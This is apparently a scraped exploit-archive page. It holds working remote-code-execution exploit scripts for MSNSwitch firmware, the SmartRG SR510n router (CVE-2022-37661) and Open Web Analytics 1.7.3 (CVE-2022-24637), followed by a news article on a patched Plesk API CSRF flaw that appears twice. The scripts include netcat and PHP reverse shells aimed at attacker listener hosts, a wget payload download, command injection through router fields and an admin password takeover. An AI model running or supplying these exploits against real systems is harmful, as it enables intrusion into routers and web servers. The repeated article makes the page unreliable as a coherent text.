key == "Password1":      PASSWORD = val"""Second vulnerability, authenticated command executionThis only works on the local lan.for full reverse shell, modify and upload netcat busybox shell script to /tmp:  shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f  download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmpref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox"""session = requests.session()# initial login, establishes our Cookieburp0_url = f"http://{TARGET}:{PORT}/goform/login"burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}session.post(burp0_url, headers=burp0_headers, data=burp0_data)# get our csrftokenburp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"data = session.get(burp0_url)csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]while True:  CMD = input('x:')  CMD_u = urllib.parse.quote_plus(CMD)  filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))  try:    hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"    session.get(hack_url, timeout=0.01)  except requests.exceptions.ReadTimeout:    pass

MSNSwitch Firmware MNT.2408 Remote Code Execution

SmartRG Router SR510n version 2.6.13 suffers from a remote code execution vulnerability.

    # Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)# Date: 13/06/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://adtran.com# Version: 2.5.15 / 2.6.13 (confirmed)# Tested on: SR506n (2.5.15) & SR510n (2.6.13)# CVE : CVE-2022-37661import requestsfrom subprocess import Popen, PIPErouter_host =3D "http://192.168.1.1"authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"lhost =3D "lo"lport =3D 80payload_port =3D 81def main():    e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE)    Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout)    send_payload(f"|nc {lhost} {payload_port}|sh")    print("done.. check shell")def get_session():    url =3D router_host + "/admin/ping.html"    headers =3D {"Authorization": "Basic {}".format(authorization_header)}    r =3D requests.get(url, headers=3Dheaders).text    i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")    s =3D ""    while r[i] !=3D "'":        s =3D s + r[i]        i =3D i + 1    return sdef send_payload(payload):    print(payload)    url =3D router_host + "/admin/pingHost.cmd"    headers =3D {"Authorization": "Basic {}".format(authorization_header)}    params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"=: get_session()}    requests.get(url, headers=3Dheaders, params=3Dparams).textmain()

SmartRG Router SR510n 2.6.13 Remote Code Execution

Open Web Analytics version 1.7.3 remote code execution exploit.

    # Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)# Date: 2022-08-30# Exploit Author: Jacob Ebben# Vendor Homepage: https://www.openwebanalytics.com/# Software Link: https://github.com/Open-Web-Analytics# Version: <1.7.4# Tested on: Linux # CVE : CVE-2022-24637import argparseimport requestsimport base64import reimport randomimport stringimport hashlibfrom termcolor import coloreddef print_message(message, type):   if type == 'SUCCESS':      print('[' + colored('SUCCESS', 'green') +  '] ' + message)   elif type == 'INFO':      print('[' + colored('INFO', 'blue') +  '] ' + message)   elif type == 'WARNING':      print('[' + colored('WARNING', 'yellow') +  '] ' + message)   elif type == 'ALERT':      print('[' + colored('ALERT', 'yellow') +  '] ' + message)   elif type == 'ERROR':      print('[' + colored('ERROR', 'red') +  '] ' + message)def get_normalized_url(url):   if url[-1] != '/':      url += '/'   if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':      url = "http://" + url   return urldef get_proxy_protocol(url):   if url[0:8].lower() == 'https://':      return 'https'   return 'http'def get_random_string(length):   chars = string.ascii_letters + string.digits   return ''.join(random.choice(chars) for i in range(length))def get_cache_content(cache_raw):   regex_cache_base64 = r'\*(\w*)\*'   regex_result = re.search(regex_cache_base64, cache_raw)   if not regex_result:      print_message('The provided URL does not appear to be vulnerable ...', "ERROR")      exit()   else:      cache_base64 = regex_result.group(1)   return base64.b64decode(cache_base64).decode("ascii")def get_cache_username(cache):   regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'   return re.search(regex_cache_username, cache).group(1)def get_cache_temppass(cache):   regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'   return re.search(regex_cache_temppass, cache).group(1)def get_update_nonce(url):   try:      update_nonce_request = session.get(url, proxies=proxies)      regex_update_nonce = r'owa_nonce" value="(\w*)"'      update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)   except Exception as e:      print_message('An error occurred when attempting to update config!', "ERROR")      print(e)      exit()   else:      return update_nonceparser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')parser.add_argument('TARGET', type=str,                   help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')parser.add_argument('ATTACKER_IP', type=str,                   help='Address for reverse shell listener on attacking machine')parser.add_argument('ATTACKER_PORT', type=str,                   help='Port for reverse shell listener on attacking machine')parser.add_argument('-u', '--username', default="admin", type=str,                  help='The username to exploit (Default: admin)')parser.add_argument('-p','--password', default=get_random_string(32), type=str,                  help='The new password for the exploited user')parser.add_argument('-P','--proxy', type=str,                  help='HTTP proxy address (Example: http://127.0.0.1:8080/)')parser.add_argument('-c', '--check', action='store_true',                  help='Check vulnerability without exploitation')args = parser.parse_args()base_url = get_normalized_url(args.TARGET)login_url = base_url + "index.php?owa_do=base.loginForm"password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"username = args.usernamenew_password = args.passwordreverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'shell_filename = get_random_string(8) + '.php'shell_url = base_url + 'owa-data/caches/' + shell_filenameif args.proxy:   proxy_url = get_normalized_url(args.proxy)   proxy_protocol = get_proxy_protocol(proxy_url)   proxies = { proxy_protocol: proxy_url }else:   proxies = {}session = requests.Session()try:   mainpage_request = session.get(base_url, proxies=proxies)except Exception as e:   print_message('Could not connect to "' + base_url, "ERROR")   exit()else:   print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")if 'Open Web Analytics' not in mainpage_request.text:   print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")elif 'version=1.7.3' not in mainpage_request.text:   print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")else:   print_message('The webserver indicates a vulnerable version!', "ALERT")try:   data = {      "owa_user_id": username,       "owa_password": username,       "owa_action": "base.login"   }   session.post(login_url, data=data, proxies=proxies)except Exception as e:   print_message('An error occurred during the login attempt!', "ERROR")   print(e)   exit()else:   print_message('Attempting to generate cache for "' + username + '" user', "INFO")print_message('Attempting to find cache of "' + username + '" user', "INFO")found = Falsefor key in range(100):   user_id = 'user_id' + str(key)   userid_hash = hashlib.md5(user_id.encode()).hexdigest()    filename = userid_hash + '.php'   cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename   cache_request = requests.get(cache_url, proxies=proxies)   if cache_request.status_code != 200:      continue;   cache_raw = cache_request.text   cache = get_cache_content(cache_raw)   cache_username = get_cache_username(cache)   if cache_username != username:      print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")      continue;   else:      found = True      breakif not found:   print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")   exit()cache_temppass = get_cache_temppass(cache)print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")if args.check:   print_message('The system appears to be vulnerable!', "ALERT")   exit()try:   data = {      "owa_password": new_password,       "owa_password2": new_password,       "owa_k": cache_temppass,       "owa_action":       "base.usersChangePassword"   }   session.post(password_reset_url, data=data, proxies=proxies)except Exception as e:   print_message('An error occurred when changing the user password!', "ERROR")   print(e)   exit()else:   print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")try:   data = {      "owa_user_id": username,       "owa_password": new_password,       "owa_action": "base.login"   }   session.post(login_url, data=data, proxies=proxies)except Exception as e:   print_message('An error occurred during the login attempt!', "ERROR")   print(e)   exit()else:   print_message('Logged in as "' + username + '" user', "SUCCESS")nonce = get_update_nonce(update_config_url)try:   log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename   data = {      "owa_nonce": nonce,       "owa_action": "base.optionsUpdate",       "owa_config[base.error_log_file]": log_location,       "owa_config[base.error_log_level]": 2   }   session.post(update_config_url, data=data, proxies=proxies)except Exception as e:   print_message('An error occurred when attempting to update config!', "ERROR")   print(e)   exit()else:   print_message('Creating log file', "INFO")nonce = get_update_nonce(update_config_url)try:   data = {      "owa_nonce": nonce,       "owa_action": "base.optionsUpdate",       "owa_config[shell]": reverse_shell    }   session.post(update_config_url, data=data, proxies=proxies)except Exception as e:   print_message('An error occurred when attempting to update config!', "ERROR")   print(e)   exit()else:   print_message('Wrote payload to log file', "INFO")try:   session.get(shell_url, proxies=proxies)except Exception as e:   print(e)else:   print_message('Triggering payload! Check your listener!', "SUCCESS")   print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")

Open Web Analytics 1.7.3 Remote Code Execution

Bugs in programming interfaces of web hosting admin tool patched

Ben Dickson 11 November 2022 at 11:31 UTC

Bugs in programming interfaces of web hosting admin tool patched

The REST API of Plesk was vulnerable to client-side request forgery (CSRF), which could lead to multiple potential attacks, including malicious file upload and privilege escalation.

Plesk is a very popular administration tool for web hosting and data center providers. Users usually use its web interface to administer their websites and file servers. This interface has been exhaustively tested and patched against security holes.

However, according to the findings of Adrian Tiron, a security researcher at Fortbridge, the REST API that allows third-party programs access to Plesk’s functionality was not as sturdy as its web user interface counterpart.

**Client-side request forgery**

While investigating Plesk during a project for one of his clients, Tiron discovered that when the REST API is called from the browser of a logged-in administrator, there are no defences against CSRF. This shortcoming meant that if an attacker lures the Plesk admin to visit a malicious page, they could stage cookieless CSRF attacks against the server.

Catch up with the latest security research news and analysis

Several API endpoints could be attacked through the cookieless CSRF exploit. The most interesting, said Tiron, was an endpoint that supported different commands, including changing the administrator’s password. Using this endpoint, the researcher was able to hijack the admin user account and gain full control of the host.

“Admin access in Plesk is very powerful. It’s identical to having root \[access\] because Plesk is used to fully manage hosts via the web interface,” Tiron told The Daily Swig.

**Other minor bugs**

Other endpoints could be exploited through other CSRF attacks, including exploits that allowed the creation of MySQL and FTP users on the Plesk server.

Since the MySQL port is blocked externally by default, adding a database user would have a limited impact.

“However, if \[MySQL\] is misconfigured, it can give RCE \[remote code execution\] on the server as a limited user – we estimate this would be a rare scenario,” Tiron said.

The FTP user would give the attacker “RCE as a limited user (at least) because the attacker can upload a web shell,” he added.

**What went wrong?**

Plesk’s web interface uses the Authorization header, which prevents unauthenticated access to the pages of the administration tool. Once a user enters their credentials, the browser automatically adds appropriate headers to the requests, enabling the server to distinguish authenticated users.

Authorization headers also prevented random unauthenticated access to the REST API endpoints. But all this can potentially be circumvented through HTML-based CSRF attacks.

“The developers probably thought that they’re protected against the CSRF because they’re using the Authorization header,” Tiron said. “While this is true for requests created with XHR (the attacker would need to know this header to add it to the request), this is not true if you're using HTML forms – in this case, the browser attaches the Authorization header automatically, by design.”

Plesk has patched the bug. According to the company, 98.4% of Plesk servers have been automatically updated and were therefore not impacted.

Tiron recommended that developers make sure that all POST requests that change the server state implement CSRF mitigation using either the synchronizer token pattern or the double submit cookie pattern. “Based on our experience we recommend the first,” Tiron concluded.

RELATED Prototype pollution bug exposed Ember.js applications to XSS

CSRF in Plesk API enabled privilege escalation

Bugs in programming interfaces of web hosting admin tool patched

The REST API of Plesk was vulnerable to client-side request forgery (CSRF), which could lead to multiple potential attacks, including malicious file upload and the takeover of the server.

Plesk is a very popular administration tool for web hosting and data center providers. Users usually use its web interface to administer their websites and file servers. This interface has been exhaustively tested and patched against security holes.

However, according to the findings of Adrian Tiron, a security researcher at Fortbridge, the REST API that allows third-party programs access to Plesk’s functionality was not as sturdy as its web user interface counterpart.

**Client-side request forgery**

While investigating Plesk during a project for one of his clients, Tiron discovered that when the REST API is called from the browser of a logged-in administrator, there are no defences against CSRF. This shortcoming meant that if an attacker lures the Plesk admin to visit a malicious page, they could stage cookieless CSRF attacks against the server.

Catch up with the latest security research news and analysis

Several API endpoints could be attacked through the cookieless CSRF exploit. The most interesting, said Tiron, was an endpoint that supported different commands, including changing the administrator’s password. Using this endpoint, the researcher was able to hijack the admin user account and gain full control of the host.

“Admin access in Plesk is very powerful. It’s identical to having root \[access\] because Plesk is used to fully manage hosts via the web interface,” Tiron told The Daily Swig.

**Other minor bugs**

Other endpoints could be exploited through other CSRF attacks, including exploits that allowed the creation of MySQL and FTP users on the Plesk server.

Since the MySQL port is blocked externally by default, adding a database user would have a limited impact.

“However, if \[MySQL\] is misconfigured, it can give RCE \[remote code execution\] on the server as a limited user – we estimate this would be a rare scenario,” Tiron said.

The FTP user would give the attacker “RCE as a limited user (at least) because the attacker can upload a web shell,” he added.

**What went wrong?**

Plesk’s web interface uses the Authorization header, which prevents unauthenticated access to the pages of the administration tool. Once a user enters their credentials, the browser automatically adds appropriate headers to the requests, enabling the server to distinguish authenticated users.

Authorization headers also prevented random unauthenticated access to the REST API endpoints. But all this can potentially be circumvented through HTML-based CSRF attacks.

“The developers probably thought that they’re protected against the CSRF because they’re using the Authorization header,” Tiron said. “While this is true for requests created with XHR (the attacker would need to know this header to add it to the request), this is not true if you're using HTML forms – in this case, the browser attaches the Authorization header automatically, by design.”

Plesk has patched the bug. According to the company, 98.4% of Plesk servers have been automatically updated and were therefore not impacted.

Tiron recommended that developers make sure that all POST requests that change the server state implement CSRF mitigation using either the synchronizer token pattern or the double submit cookie pattern. “Based on our experience we recommend the first,” Tiron concluded.

RELATED Prototype pollution bug exposed Ember.js applications to XSS

Tag

#rce